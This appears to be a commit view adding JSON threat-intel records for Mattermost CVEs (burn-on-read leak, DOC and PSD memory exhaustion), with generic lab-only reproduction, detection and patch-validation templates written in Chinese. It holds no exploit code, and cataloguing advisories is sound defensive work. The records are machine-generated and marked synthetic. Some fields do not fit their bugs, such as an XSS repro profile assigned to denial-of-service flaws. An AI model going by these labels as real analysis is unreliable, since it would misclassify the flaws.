"\u4fdd\u7559\u540c\u4e00\u7ec4\u53d7\u63a7\u8f93\u5165\uff0c\u5728\u4fee\u590d\u524d\u540e\u5206\u522b\u6267\u884c\u5e76\u6bd4\u5bf9\u54cd\u5e94\u3001\u65e5\u5fd7\u4e0e\u6d4f\u89c8\u5668\u8bc1\u636e\u3002",
"\u786e\u8ba4\u4fee\u590d\u540e\u4ec5\u4fdd\u7559\u9884\u671f\u4e1a\u52a1\u884c\u4e3a\uff0c\u4e0d\u518d\u89e6\u53d1\u8d8a\u6743\u3001\u56de\u663e\u3001\u5f02\u5e38\u6e32\u67d3\u6216\u9519\u8bef\u8bf7\u6c42\u3002",
"\u8865\u5145 `unknown` \u65cf\u81ea\u52a8\u5316\u56de\u5f52\uff0c\u907f\u514d\u540c\u7c7b\u8def\u5f84\u5728\u63d2\u4ef6\u3001\u4e3b\u9898\u6216\u4ee3\u7406\u94fe\u4e2d\u56de\u5f52\u3002"
],
"lab_safety_notes": [
"\u53ea\u4f7f\u7528\u56de\u73af\u5730\u5740\u3001\u54e8\u5175\u76ee\u6807\u3001\u65e0\u5bb3\u6837\u672c\u6216\u53ef\u56de\u6eda\u6d4b\u8bd5\u6570\u636e\u3002",
"\u7981\u6b62\u9020\u6210\u6301\u4e45\u7834\u574f\u3001\u8d8a\u6743\u4e0b\u8f7d\u771f\u5b9e\u6570\u636e\u6216\u4e0d\u53ef\u56de\u6eda side effect\u3002",
"\u5982\u9700\u6d4f\u89c8\u5668\u8bc1\u636e\uff0c\u4fdd\u7559 baseline / proof \u4e24\u4efd\u5feb\u7167\u4ee5\u53ca console / network \u8bb0\u5f55\u3002"
],
"review_state": "ready"
},
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"historical_status": null,
"latest_status": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "xss-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Mattermost"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 2,
"entity_ref_count": 2,
"advisory_scope": "repo",
"version_confidence": "high",
"workflow_id": "mattermost--CVE-2026-24692--workflow"
}
}

230
08-threat-intel/registry/advisories/mattermost--CVE-2026-2578.json 普通文件
查看文件

@@ -0,0 +1,230 @@
{
"canonical_id": "mattermost--CVE-2026-2578",
"system_id": "mattermost",
"display_name": "Mattermost",
"category": "platforms",
"advisory_mode": "core",
"title": "Mattermost fails to preserve the redacted state of burn-on-read posts during deletion",
"summary": "Mattermost versions 11.3.x <= 11.3.0 fail to preserve the redacted state of burn-on-read posts during deletion which allows channel members to access unrevealed burn-on-read message contents via the WebSocket post deletion event. Mattermost Advisory ID: MMSA-2026-00579",
"published_at": "2026-03-16T15:30:43Z",
"updated_at": "2026-03-23T18:56:01.583567Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "ecosystem-authority",
"official_source_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2578",
"secondary_source_urls": [
"https://github.com/advisories/GHSA-3rhr-jr63-hwq5",
"https://github.com/mattermost/mattermost/commit/c6b205f0d77080ef805783de0628b9526af7faec",
"https://github.com/mattermost/mattermost",
"https://mattermost.com/security-updates"
],
"aliases": [
"CVE-2026-2578",
"GO-2026-4734",
"GHSA-3rhr-jr63-hwq5"
],
"cve_ids": [
"CVE-2026-2578"
],
"ghsa_ids": [
"GHSA-3rhr-jr63-hwq5"
],
"osv_ids": [
"GHSA-3rhr-jr63-hwq5",
"GO-2026-4734"
],
"affected_versions": [
"introduced=0, fixed<8.0.0-20260127062706-c6b205f0d770",
"introduced=0, fixed<5.3.2-0.20260127062706-c6b205f0d770",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"fixed_versions": [
"8.0.0-20260127062706-c6b205f0d770",
"5.3.2-0.20260127062706-c6b205f0d770",
"10.11.11",
"11.2.3",
"11.3.1",
"10.11.11+incompatible",
"11.2.3+incompatible",
"11.3.1+incompatible"
],
"package_name": "github.com/mattermost/mattermost-server",
"render_markdown": true,
"case_path": "07-framework-security/platforms/mattermost/cases/mattermost-cve-2026-2578.md",
"secure_code_topics": [
"authz-server-side-recheck",
"xss-output-encoding",
"token-cookie-storage",
"dependency-upgrade-policy"
],
"status": "generated",
"triage_reasons": [],
"entity_refs": [
{
"entity_id": "mattermost",
"entity_type": "system",
"relation": "root-system",
"root_system_id": "mattermost",
"official": true
},
{
"entity_id": "mattermost--repo--github-com-mattermost-mattermost-server",
"entity_type": "repo",
"relation": "affected-component",
"root_system_id": "mattermost",
"official": false
}
],
"affected_components": [
{
"name": "mattermost / mattermost-server",
"entity_id": "mattermost--repo--github-com-mattermost-mattermost-server",
"scope": "repo",
"package_name": "github.com/mattermost/mattermost-server",
"official": false
}
],
"affected_version_ranges": [
"introduced=0, fixed<8.0.0-20260127062706-c6b205f0d770",
"introduced=0, fixed<5.3.2-0.20260127062706-c6b205f0d770",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"fixed_version_ranges": [
"8.0.0-20260127062706-c6b205f0d770",
"5.3.2-0.20260127062706-c6b205f0d770",
"10.11.11",
"11.2.3",
"11.3.1",
"10.11.11+incompatible",
"11.2.3+incompatible",
"11.3.1+incompatible"
],
"introduced_version": "introduced=0",
"patched_version": "8.0.0-20260127062706-c6b205f0d770",
"version_evidence_sources": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-2578",
"https://github.com/advisories/GHSA-3rhr-jr63-hwq5",
"https://github.com/mattermost/mattermost/commit/c6b205f0d77080ef805783de0628b9526af7faec",
"https://github.com/mattermost/mattermost",
"https://mattermost.com/security-updates"
],
"affected_version_refs": [
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0-fixed-8-0-0-20260127062706-c6b205f0d770",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0-fixed-5-3-2-0-20260127062706-c6b205f0d770",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-10-11-0-rc1-fixed-10-11-11",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-11-2-0-rc1-fixed-11-2-3",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-11-3-0-rc1-fixed-11-3-1",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-10-11-0-rc1-incompatible-fixed-10-11-11-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0"
],
"fixed_version_refs": [
"mattermost--repo--github-com-mattermost-mattermost-server--8-0-0-20260127062706-c6b205f0d770",
"mattermost--repo--github-com-mattermost-mattermost-server--5-3-2-0-20260127062706-c6b205f0d770",
"mattermost--repo--github-com-mattermost-mattermost-server--10-11-11",
"mattermost--repo--github-com-mattermost-mattermost-server--11-2-3",
"mattermost--repo--github-com-mattermost-mattermost-server--11-3-1",
"mattermost--repo--github-com-mattermost-mattermost-server--10-11-11-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--11-2-3-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--11-3-1-incompatible"
],
"patched_version_refs": [
"mattermost--repo--github-com-mattermost-mattermost-server--8-0-0-20260127062706-c6b205f0d770"
],
"version_sync_confidence": "high",
"advisory_scope": "repo",
"version_confidence": "high",
"version_gap_reason": "",
"version_resolution_needed": false,
"workflow": {
"workflow_id": "mattermost--CVE-2026-2578--workflow",
"vuln_family": "unknown",
"entry_surface": "repo-surface",
"preconditions": [
"\u4ec5\u5728 lab-local\u3001lab-public \u6216\u660e\u786e\u6388\u6743\u76ee\u6807\u4e2d\u6267\u884c\u3002",
"\u786e\u8ba4\u76ee\u6807\u547d\u4e2d\u7248\u672c\u65ad\u8a00: introduced=0, fixed<8.0.0-20260127062706-c6b205f0d770, introduced=0, fixed<5.3.2-0.20260127062706-c6b205f0d770, introduced=10.11.0-rc1, fixed<10.11.11",
"\u82e5\u5bf9\u8c61\u5c5e\u4e8e `repo`\uff0c\u5148\u786e\u8ba4\u6269\u5c55/\u4ed3\u5e93/\u5305\u5df2\u542f\u7528\u5e76\u5904\u4e8e\u53d7\u5f71\u54cd\u7248\u672c\u3002"
],
"required_role": "unknown",
"affected_version_assertion": [
"introduced=0, fixed<8.0.0-20260127062706-c6b205f0d770",
"introduced=0, fixed<5.3.2-0.20260127062706-c6b205f0d770",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"trigger_vector": "\u5bf9 `unknown` \u5bb6\u65cf\u5165\u53e3\u6295\u9012\u6700\u5c0f\u5316\u3001\u53ef\u5ba1\u8ba1\u3001\u53ef\u56de\u6eda\u7684\u53d7\u63a7\u8f93\u5165\uff0c\u6bd4\u8f83\u4fee\u590d\u524d\u540e\u5dee\u5f02\u3002",
"request_or_ui_path": [
"/repo"
],
"input_shape": "\u63d0\u4ea4\u6700\u5c0f\u5316\u3001\u53ef\u5ba1\u8ba1\u3001\u53ef\u56de\u6eda\u7684\u53d7\u63a7\u8f93\u5165\u3002",
"expected_unsafe_behavior": "\u76ee\u6807\u8868\u73b0\u51fa\u8d85\u51fa\u8bbe\u8ba1\u8fb9\u754c\u7684\u884c\u4e3a\u3002",
"server_evidence_points": [
"\u5e94\u7528\u65e5\u5fd7\u4e2d\u7684\u547d\u4e2d\u8def\u5f84\u3001\u9274\u6743\u51b3\u7b56\u548c\u5f02\u5e38\u6808",
"\u53cd\u5411\u4ee3\u7406\u6216\u8fb9\u754c\u5c42\u65e5\u5fd7\u4e2d\u7684\u8bf7\u6c42\u5934\u3001\u6765\u6e90 IP \u4e0e\u8def\u7531\u51b3\u7b56"
],
"browser_evidence_points": [
"\u57fa\u7ebf\u622a\u56fe\u4e0e\u653b\u51fb\u540e\u622a\u56fe\u7684 DOM/\u89c6\u89c9\u5dee\u5f02",
"console\u3001network \u4e0e response metadata \u4e2d\u7684\u5f02\u5e38\u4fe1\u53f7"
],
"db_or_fs_evidence_points": [
"\u6570\u636e\u5e93\u4e2d\u65b0\u589e/\u8d8a\u6743\u8bfb\u53d6\u7684\u6d4b\u8bd5\u6570\u636e",
"\u6587\u4ef6\u7cfb\u7edf\u4e2d\u65b0\u589e\u4e0a\u4f20\u6837\u672c\u3001\u7f13\u5b58\u6761\u76ee\u6216\u8d8a\u6743\u8bfb\u53d6\u75d5\u8ff9"
],
"detection_signals": [
"WAF / reverse proxy \u5f02\u5e38\u65e5\u5fd7\u3001\u8bbf\u95ee\u65e5\u5fd7\u548c\u544a\u8b66",
"\u5e94\u7528\u5ba1\u8ba1\u65e5\u5fd7\u4e2d\u7684\u6743\u9650\u9519\u8bef\u3001\u91cd\u5b9a\u5411\u5f02\u5e38\u3001\u6a21\u677f\u6e32\u67d3\u6216\u4e0a\u4f20\u843d\u76d8\u4e8b\u4ef6"
],
"mitigation_summary": "\u4f18\u5148\u5347\u7ea7\u5230\u4fee\u590d\u7248\u672c\uff0c\u5e76\u540c\u65f6\u6536\u7d27\u8f93\u5165\u6821\u9a8c\u3001\u670d\u52a1\u7aef\u9274\u6743\u3001\u4ee3\u7406\u4fe1\u4efb\u8fb9\u754c\u3001\u6269\u5c55\u5b89\u88c5\u4fe1\u4efb\u548c\u5ba1\u8ba1\u65e5\u5fd7\u3002",
"patch_validation_steps": [
"\u786e\u8ba4\u76ee\u6807\u7248\u672c\u4ece `introduced=0, fixed<8.0.0-20260127062706-c6b205f0d770, introduced=0, fixed<5.3.2-0.20260127062706-c6b205f0d770, introduced=10.11.0-rc1, fixed<10.11.11` \u5347\u7ea7\u6216\u56de\u79fb\u5230 `8.0.0-20260127062706-c6b205f0d770`\u3002",
"\u4fdd\u7559\u540c\u4e00\u7ec4\u53d7\u63a7\u8f93\u5165\uff0c\u5728\u4fee\u590d\u524d\u540e\u5206\u522b\u6267\u884c\u5e76\u6bd4\u5bf9\u54cd\u5e94\u3001\u65e5\u5fd7\u4e0e\u6d4f\u89c8\u5668\u8bc1\u636e\u3002",
"\u786e\u8ba4\u4fee\u590d\u540e\u4ec5\u4fdd\u7559\u9884\u671f\u4e1a\u52a1\u884c\u4e3a\uff0c\u4e0d\u518d\u89e6\u53d1\u8d8a\u6743\u3001\u56de\u663e\u3001\u5f02\u5e38\u6e32\u67d3\u6216\u9519\u8bef\u8bf7\u6c42\u3002",
"\u8865\u5145 `unknown` \u65cf\u81ea\u52a8\u5316\u56de\u5f52\uff0c\u907f\u514d\u540c\u7c7b\u8def\u5f84\u5728\u63d2\u4ef6\u3001\u4e3b\u9898\u6216\u4ee3\u7406\u94fe\u4e2d\u56de\u5f52\u3002"
],
"lab_safety_notes": [
"\u53ea\u4f7f\u7528\u56de\u73af\u5730\u5740\u3001\u54e8\u5175\u76ee\u6807\u3001\u65e0\u5bb3\u6837\u672c\u6216\u53ef\u56de\u6eda\u6d4b\u8bd5\u6570\u636e\u3002",
"\u7981\u6b62\u9020\u6210\u6301\u4e45\u7834\u574f\u3001\u8d8a\u6743\u4e0b\u8f7d\u771f\u5b9e\u6570\u636e\u6216\u4e0d\u53ef\u56de\u6eda side effect\u3002",
"\u5982\u9700\u6d4f\u89c8\u5668\u8bc1\u636e\uff0c\u4fdd\u7559 baseline / proof \u4e24\u4efd\u5feb\u7167\u4ee5\u53ca console / network \u8bb0\u5f55\u3002"
],
"review_state": "ready"
},
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"historical_status": null,
"latest_status": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "xss-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Mattermost"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 2,
"entity_ref_count": 2,
"advisory_scope": "repo",
"version_confidence": "high",
"workflow_id": "mattermost--CVE-2026-2578--workflow"
}
}

231
08-threat-intel/registry/advisories/mattermost--CVE-2026-25780.json 普通文件
查看文件

@@ -0,0 +1,231 @@
{
"canonical_id": "mattermost--CVE-2026-25780",
"system_id": "mattermost",
"display_name": "Mattermost",
"category": "platforms",
"advisory_mode": "core",
"title": "Mattermost fails to bound memory allocation when processing DOC files",
"summary": "Mattermost versions 11.3.x <= 11.3.0, 11.2.x <= 11.2.2, 10.11.x <= 10.11.10 fail to bound memory allocation when processing DOC files which allows an authenticated attacker to cause server memory exhaustion and denial of service via uploading a specially crafted DOC file.. Mattermost Advisory ID: MMSA-2026-00581",
"published_at": "2026-03-16T15:30:42Z",
"updated_at": "2026-03-23T18:56:18.467718Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "ecosystem-authority",
"official_source_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25780",
"secondary_source_urls": [
"https://github.com/advisories/GHSA-xv2p-wchj-qjhp",
"https://github.com/mattermost/mattermost/commit/86797c508c444e299b20889ce241fde505a402cc",
"https://github.com/mattermost/mattermost",
"https://mattermost.com/security-updates"
],
"aliases": [
"CVE-2026-25780",
"GO-2026-4733",
"GHSA-xv2p-wchj-qjhp"
],
"cve_ids": [
"CVE-2026-25780"
],
"ghsa_ids": [
"GHSA-xv2p-wchj-qjhp"
],
"osv_ids": [
"GHSA-xv2p-wchj-qjhp",
"GO-2026-4733"
],
"affected_versions": [
"introduced=0, fixed<8.0.0-20260123215601-86797c508c44",
"introduced=0, fixed<5.3.2-0.20260123215601-86797c508c44",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"fixed_versions": [
"8.0.0-20260123215601-86797c508c44",
"5.3.2-0.20260123215601-86797c508c44",
"10.11.11",
"11.2.3",
"11.3.1",
"10.11.11+incompatible",
"11.2.3+incompatible",
"11.3.1+incompatible"
],
"package_name": "github.com/mattermost/mattermost-server",
"render_markdown": true,
"case_path": "07-framework-security/platforms/mattermost/cases/mattermost-cve-2026-25780.md",
"secure_code_topics": [
"authz-server-side-recheck",
"xss-output-encoding",
"token-cookie-storage",
"file-upload-validation",
"dependency-upgrade-policy"
],
"status": "generated",
"triage_reasons": [],
"entity_refs": [
{
"entity_id": "mattermost",
"entity_type": "system",
"relation": "root-system",
"root_system_id": "mattermost",
"official": true
},
{
"entity_id": "mattermost--repo--github-com-mattermost-mattermost-server",
"entity_type": "repo",
"relation": "affected-component",
"root_system_id": "mattermost",
"official": false
}
],
"affected_components": [
{
"name": "mattermost / mattermost-server",
"entity_id": "mattermost--repo--github-com-mattermost-mattermost-server",
"scope": "repo",
"package_name": "github.com/mattermost/mattermost-server",
"official": false
}
],
"affected_version_ranges": [
"introduced=0, fixed<8.0.0-20260123215601-86797c508c44",
"introduced=0, fixed<5.3.2-0.20260123215601-86797c508c44",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"fixed_version_ranges": [
"8.0.0-20260123215601-86797c508c44",
"5.3.2-0.20260123215601-86797c508c44",
"10.11.11",
"11.2.3",
"11.3.1",
"10.11.11+incompatible",
"11.2.3+incompatible",
"11.3.1+incompatible"
],
"introduced_version": "introduced=0",
"patched_version": "8.0.0-20260123215601-86797c508c44",
"version_evidence_sources": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-25780",
"https://github.com/advisories/GHSA-xv2p-wchj-qjhp",
"https://github.com/mattermost/mattermost/commit/86797c508c444e299b20889ce241fde505a402cc",
"https://github.com/mattermost/mattermost",
"https://mattermost.com/security-updates"
],
"affected_version_refs": [
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0-fixed-8-0-0-20260123215601-86797c508c44",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0-fixed-5-3-2-0-20260123215601-86797c508c44",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-10-11-0-rc1-fixed-10-11-11",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-11-2-0-rc1-fixed-11-2-3",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-11-3-0-rc1-fixed-11-3-1",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-10-11-0-rc1-incompatible-fixed-10-11-11-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0"
],
"fixed_version_refs": [
"mattermost--repo--github-com-mattermost-mattermost-server--8-0-0-20260123215601-86797c508c44",
"mattermost--repo--github-com-mattermost-mattermost-server--5-3-2-0-20260123215601-86797c508c44",
"mattermost--repo--github-com-mattermost-mattermost-server--10-11-11",
"mattermost--repo--github-com-mattermost-mattermost-server--11-2-3",
"mattermost--repo--github-com-mattermost-mattermost-server--11-3-1",
"mattermost--repo--github-com-mattermost-mattermost-server--10-11-11-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--11-2-3-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--11-3-1-incompatible"
],
"patched_version_refs": [
"mattermost--repo--github-com-mattermost-mattermost-server--8-0-0-20260123215601-86797c508c44"
],
"version_sync_confidence": "high",
"advisory_scope": "repo",
"version_confidence": "high",
"version_gap_reason": "",
"version_resolution_needed": false,
"workflow": {
"workflow_id": "mattermost--CVE-2026-25780--workflow",
"vuln_family": "unknown",
"entry_surface": "repo-surface",
"preconditions": [
"\u4ec5\u5728 lab-local\u3001lab-public \u6216\u660e\u786e\u6388\u6743\u76ee\u6807\u4e2d\u6267\u884c\u3002",
"\u786e\u8ba4\u76ee\u6807\u547d\u4e2d\u7248\u672c\u65ad\u8a00: introduced=0, fixed<8.0.0-20260123215601-86797c508c44, introduced=0, fixed<5.3.2-0.20260123215601-86797c508c44, introduced=10.11.0-rc1, fixed<10.11.11",
"\u82e5\u5bf9\u8c61\u5c5e\u4e8e `repo`\uff0c\u5148\u786e\u8ba4\u6269\u5c55/\u4ed3\u5e93/\u5305\u5df2\u542f\u7528\u5e76\u5904\u4e8e\u53d7\u5f71\u54cd\u7248\u672c\u3002"
],
"required_role": "unknown",
"affected_version_assertion": [
"introduced=0, fixed<8.0.0-20260123215601-86797c508c44",
"introduced=0, fixed<5.3.2-0.20260123215601-86797c508c44",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"trigger_vector": "\u5bf9 `unknown` \u5bb6\u65cf\u5165\u53e3\u6295\u9012\u6700\u5c0f\u5316\u3001\u53ef\u5ba1\u8ba1\u3001\u53ef\u56de\u6eda\u7684\u53d7\u63a7\u8f93\u5165\uff0c\u6bd4\u8f83\u4fee\u590d\u524d\u540e\u5dee\u5f02\u3002",
"request_or_ui_path": [
"/repo"
],
"input_shape": "\u63d0\u4ea4\u6700\u5c0f\u5316\u3001\u53ef\u5ba1\u8ba1\u3001\u53ef\u56de\u6eda\u7684\u53d7\u63a7\u8f93\u5165\u3002",
"expected_unsafe_behavior": "\u76ee\u6807\u8868\u73b0\u51fa\u8d85\u51fa\u8bbe\u8ba1\u8fb9\u754c\u7684\u884c\u4e3a\u3002",
"server_evidence_points": [
"\u5e94\u7528\u65e5\u5fd7\u4e2d\u7684\u547d\u4e2d\u8def\u5f84\u3001\u9274\u6743\u51b3\u7b56\u548c\u5f02\u5e38\u6808",
"\u53cd\u5411\u4ee3\u7406\u6216\u8fb9\u754c\u5c42\u65e5\u5fd7\u4e2d\u7684\u8bf7\u6c42\u5934\u3001\u6765\u6e90 IP \u4e0e\u8def\u7531\u51b3\u7b56"
],
"browser_evidence_points": [
"\u57fa\u7ebf\u622a\u56fe\u4e0e\u653b\u51fb\u540e\u622a\u56fe\u7684 DOM/\u89c6\u89c9\u5dee\u5f02",
"console\u3001network \u4e0e response metadata \u4e2d\u7684\u5f02\u5e38\u4fe1\u53f7"
],
"db_or_fs_evidence_points": [
"\u6570\u636e\u5e93\u4e2d\u65b0\u589e/\u8d8a\u6743\u8bfb\u53d6\u7684\u6d4b\u8bd5\u6570\u636e",
"\u6587\u4ef6\u7cfb\u7edf\u4e2d\u65b0\u589e\u4e0a\u4f20\u6837\u672c\u3001\u7f13\u5b58\u6761\u76ee\u6216\u8d8a\u6743\u8bfb\u53d6\u75d5\u8ff9"
],
"detection_signals": [
"WAF / reverse proxy \u5f02\u5e38\u65e5\u5fd7\u3001\u8bbf\u95ee\u65e5\u5fd7\u548c\u544a\u8b66",
"\u5e94\u7528\u5ba1\u8ba1\u65e5\u5fd7\u4e2d\u7684\u6743\u9650\u9519\u8bef\u3001\u91cd\u5b9a\u5411\u5f02\u5e38\u3001\u6a21\u677f\u6e32\u67d3\u6216\u4e0a\u4f20\u843d\u76d8\u4e8b\u4ef6"
],
"mitigation_summary": "\u4f18\u5148\u5347\u7ea7\u5230\u4fee\u590d\u7248\u672c\uff0c\u5e76\u540c\u65f6\u6536\u7d27\u8f93\u5165\u6821\u9a8c\u3001\u670d\u52a1\u7aef\u9274\u6743\u3001\u4ee3\u7406\u4fe1\u4efb\u8fb9\u754c\u3001\u6269\u5c55\u5b89\u88c5\u4fe1\u4efb\u548c\u5ba1\u8ba1\u65e5\u5fd7\u3002",
"patch_validation_steps": [
"\u786e\u8ba4\u76ee\u6807\u7248\u672c\u4ece `introduced=0, fixed<8.0.0-20260123215601-86797c508c44, introduced=0, fixed<5.3.2-0.20260123215601-86797c508c44, introduced=10.11.0-rc1, fixed<10.11.11` \u5347\u7ea7\u6216\u56de\u79fb\u5230 `8.0.0-20260123215601-86797c508c44`\u3002",
"\u4fdd\u7559\u540c\u4e00\u7ec4\u53d7\u63a7\u8f93\u5165\uff0c\u5728\u4fee\u590d\u524d\u540e\u5206\u522b\u6267\u884c\u5e76\u6bd4\u5bf9\u54cd\u5e94\u3001\u65e5\u5fd7\u4e0e\u6d4f\u89c8\u5668\u8bc1\u636e\u3002",
"\u786e\u8ba4\u4fee\u590d\u540e\u4ec5\u4fdd\u7559\u9884\u671f\u4e1a\u52a1\u884c\u4e3a\uff0c\u4e0d\u518d\u89e6\u53d1\u8d8a\u6743\u3001\u56de\u663e\u3001\u5f02\u5e38\u6e32\u67d3\u6216\u9519\u8bef\u8bf7\u6c42\u3002",
"\u8865\u5145 `unknown` \u65cf\u81ea\u52a8\u5316\u56de\u5f52\uff0c\u907f\u514d\u540c\u7c7b\u8def\u5f84\u5728\u63d2\u4ef6\u3001\u4e3b\u9898\u6216\u4ee3\u7406\u94fe\u4e2d\u56de\u5f52\u3002"
],
"lab_safety_notes": [
"\u53ea\u4f7f\u7528\u56de\u73af\u5730\u5740\u3001\u54e8\u5175\u76ee\u6807\u3001\u65e0\u5bb3\u6837\u672c\u6216\u53ef\u56de\u6eda\u6d4b\u8bd5\u6570\u636e\u3002",
"\u7981\u6b62\u9020\u6210\u6301\u4e45\u7834\u574f\u3001\u8d8a\u6743\u4e0b\u8f7d\u771f\u5b9e\u6570\u636e\u6216\u4e0d\u53ef\u56de\u6eda side effect\u3002",
"\u5982\u9700\u6d4f\u89c8\u5668\u8bc1\u636e\uff0c\u4fdd\u7559 baseline / proof \u4e24\u4efd\u5feb\u7167\u4ee5\u53ca console / network \u8bb0\u5f55\u3002"
],
"review_state": "ready"
},
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"historical_status": null,
"latest_status": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "xss-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Mattermost"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 2,
"entity_ref_count": 2,
"advisory_scope": "repo",
"version_confidence": "high",
"workflow_id": "mattermost--CVE-2026-25780--workflow"
}
}

229
08-threat-intel/registry/advisories/mattermost--CVE-2026-26246.json 普通文件
查看文件

@@ -0,0 +1,229 @@
{
"canonical_id": "mattermost--CVE-2026-26246",
"system_id": "mattermost",
"display_name": "Mattermost",
"category": "platforms",
"advisory_mode": "core",
"title": "Mattermost fails to bound memory allocation when processing PSD image files",
"summary": "Mattermost versions 11.3.x <= 11.3.0, 11.2.x <= 11.2.2, 10.11.x <= 10.11.10 fail to bound memory allocation when processing PSD image files which allows an authenticated attacker to cause server memory exhaustion and denial of service via uploading a specially crafted PSD file. Mattermost Advisory ID: MMSA-2026-00572",
"published_at": "2026-03-16T15:30:42Z",
"updated_at": "2026-03-23T18:56:08.918090Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "ecosystem-authority",
"official_source_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26246",
"secondary_source_urls": [
"https://github.com/mattermost/mattermost/commit/38b413a27604e8721fbe008f8ec4b4e6c47ad4f0",
"https://github.com/mattermost/mattermost",
"https://mattermost.com/security-updates"
],
"aliases": [
"CVE-2026-26246",
"GO-2026-4727",
"GHSA-44mv-jq72-gj49"
],
"cve_ids": [
"CVE-2026-26246"
],
"ghsa_ids": [
"GHSA-44mv-jq72-gj49"
],
"osv_ids": [
"GHSA-44mv-jq72-gj49",
"GO-2026-4727"
],
"affected_versions": [
"introduced=0, fixed<8.0.0-20260115183946-38b413a27604",
"introduced=0, fixed<5.3.2-0.20260115183946-38b413a27604",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"fixed_versions": [
"8.0.0-20260115183946-38b413a27604",
"5.3.2-0.20260115183946-38b413a27604",
"10.11.11",
"11.2.3",
"11.3.1",
"10.11.11+incompatible",
"11.2.3+incompatible",
"11.3.1+incompatible"
],
"package_name": "github.com/mattermost/mattermost-server",
"render_markdown": true,
"case_path": "07-framework-security/platforms/mattermost/cases/mattermost-cve-2026-26246.md",
"secure_code_topics": [
"authz-server-side-recheck",
"xss-output-encoding",
"token-cookie-storage",
"file-upload-validation",
"dependency-upgrade-policy"
],
"status": "generated",
"triage_reasons": [],
"entity_refs": [
{
"entity_id": "mattermost",
"entity_type": "system",
"relation": "root-system",
"root_system_id": "mattermost",
"official": true
},
{
"entity_id": "mattermost--repo--github-com-mattermost-mattermost-server",
"entity_type": "repo",
"relation": "affected-component",
"root_system_id": "mattermost",
"official": false
}
],
"affected_components": [
{
"name": "mattermost / mattermost-server",
"entity_id": "mattermost--repo--github-com-mattermost-mattermost-server",
"scope": "repo",
"package_name": "github.com/mattermost/mattermost-server",
"official": false
}
],
"affected_version_ranges": [
"introduced=0, fixed<8.0.0-20260115183946-38b413a27604",
"introduced=0, fixed<5.3.2-0.20260115183946-38b413a27604",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"fixed_version_ranges": [
